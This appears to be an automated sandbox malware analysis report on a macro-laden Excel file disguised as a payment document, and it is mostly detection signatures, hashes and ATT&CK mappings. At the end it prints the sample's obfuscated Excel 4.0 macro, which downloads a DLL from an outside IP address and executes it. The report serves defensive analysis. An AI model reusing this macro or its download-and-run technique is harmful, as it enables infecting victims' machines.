Analysis Report INDIV_PAYM_633854-506518488.xlsb
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Section loaded: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | DLL Side-Loading1 | Process Injection1 | Regsvr321 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution21 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Masquerading1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.180.199.125 | unknown | Netherlands | 14576 | HOSTING-SOLUTIONSUS | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 433255 |
Start date: | 11.06.2021 |
Start time: | 14:49:02 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 24s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | INDIV_PAYM_633854-506518488.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 18 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSB@3/9@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.180.199.125 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
HOSTING-SOLUTIONSUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134922 |
Entropy (8bit): | 5.369089751778702 |
Encrypted: | false |
SSDEEP: | 1536:ncQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:TEQ9DQW+ziXOe |
MD5: | C1EDAF86F426B84FAC2104ED061EA944 |
SHA1: | 24D1CD0E890F2A4BA6930F470F50D04CE7E15920 |
SHA-256: | 00B9E5E95119D8B5E2EB2351D7FD6492078B14A17DE6F3C0639F5D96BEF7BC99 |
SHA-512: | 4231020218B88253F8D7D38158755539DE3E972B4163577E355EEFE6C6ADE63749613B6CDC53EEE0E2E97E81D123CEEB5366CC0F5608E2388196AE58F8111D3E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6177 |
Entropy (8bit): | 7.959095006853368 |
Encrypted: | false |
SSDEEP: | 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a |
MD5: | C7ED6FC355D8632DB1464BE3D56BF5CC |
SHA1: | 615484A338922DDF00B903CFA48060AD60D70207 |
SHA-256: | 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C |
SHA-512: | FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 956 |
Entropy (8bit): | 7.683552542542939 |
Encrypted: | false |
SSDEEP: | 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB |
MD5: | 32C83607A5C98C5A634278E5AED3AD61 |
SHA1: | EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362 |
SHA-256: | 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF |
SHA-512: | AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5744 |
Entropy (8bit): | 7.966496386988271 |
Encrypted: | false |
SSDEEP: | 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf |
MD5: | 9AD30E24270C495AE68EAF3A1EEECBFB |
SHA1: | 8642D256E7FFBEF5804A2D2220A1FE475A99DC36 |
SHA-256: | 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20 |
SHA-512: | EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9924 |
Entropy (8bit): | 7.973758306371751 |
Encrypted: | false |
SSDEEP: | 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB |
MD5: | B34FB4F2F0F9E70B72BA3AFD028CD97C |
SHA1: | C6868336F78DEA1E718965DF3341039581DB5B5A |
SHA-256: | 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB |
SHA-512: | 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 23989 |
Entropy (8bit): | 7.989754044300238 |
Encrypted: | false |
SSDEEP: | 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy |
MD5: | 839795652A8FE78F26F4D86D757ABDE8 |
SHA1: | 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60 |
SHA-256: | 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E |
SHA-512: | E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 79256 |
Entropy (8bit): | 7.896452643285173 |
Encrypted: | false |
SSDEEP: | 1536:9+milem3l7eO+dRRVnyYPlMVGoIahaDHTU6hryF70cAeWvijWGHL:9+wol7eO6RSYP2sTU2yF70cAijW2L |
MD5: | 69D8C4FE679D4CD97306A32FD7457456 |
SHA1: | 6466079B161A8677080CE83DCFC6841C59B82350 |
SHA-256: | ADD2FC296BCFF22DC4247BAE39D2B7DB5BD08484CB56403A0CB2A49E3273F25C |
SHA-512: | AC7BEBEE4C0888762928F01A0715FE1698ECB37D93BC2EB0022B6ED008953EC12F52567171B1EE6BBE38BD64B3B106457FE053BF52E5B93979A4A9B5BEEC5BEF |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.875828596690012 |
TrID: |
|
File name: | INDIV_PAYM_633854-506518488.xlsb |
File size: | 63444 |
MD5: | 38cab943e9882cad5d389e47ce0070ed |
SHA1: | fe99ceae30df2196a413a0f841716ec88fdc7a7e |
SHA256: | 17c5220167efeb1fcaceb99e62339e7ffb904149dfad6c0f2d2b78800a329218 |
SHA512: | 901e342dec5dbaeedf2de9a31a3e1f2fa23e97975566628dbb8544a1c70685412a1730b275f0784e6d46f92ba3c86bd789b955f54d4e4986bd2735f798159263 |
SSDEEP: | 1536:KMTMXwc5jlMVGoIahaDHTU6hryF70liWWGH0AeWca:KMTi5j2sTU2yF70liWW20Ra |
File Content Preview: | PK..........!..<......z.......[Content_Types].xml ...(.........................................................................................................................&&.............................................................................. |
File Icon |
---|
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "INDIV_PAYM_633854-506518488.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
CALL(UR, UR, JJC, 0, ht, ..\jbeiwmje.dll, 0, 0)
,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,tp://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,185.180.199.125/s1.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\jbeiwmje.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,A,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=EXEC(before.2.18.42.sheet!BK73&before.2.18.42.sheet!BK74&before.2.18.42.sheet!BK75&before.2.18.42.sheet!BN24),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,LMon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT()"=CALL(BJ29&BN29,BR66&BR69&BX72&BZ72&BS25,BP81&BX73,BU64,BJ19&BJ20&BJ21&BJ22,BN24,BU69,BU72)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=before.2.18.42.sheet!BZ25(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,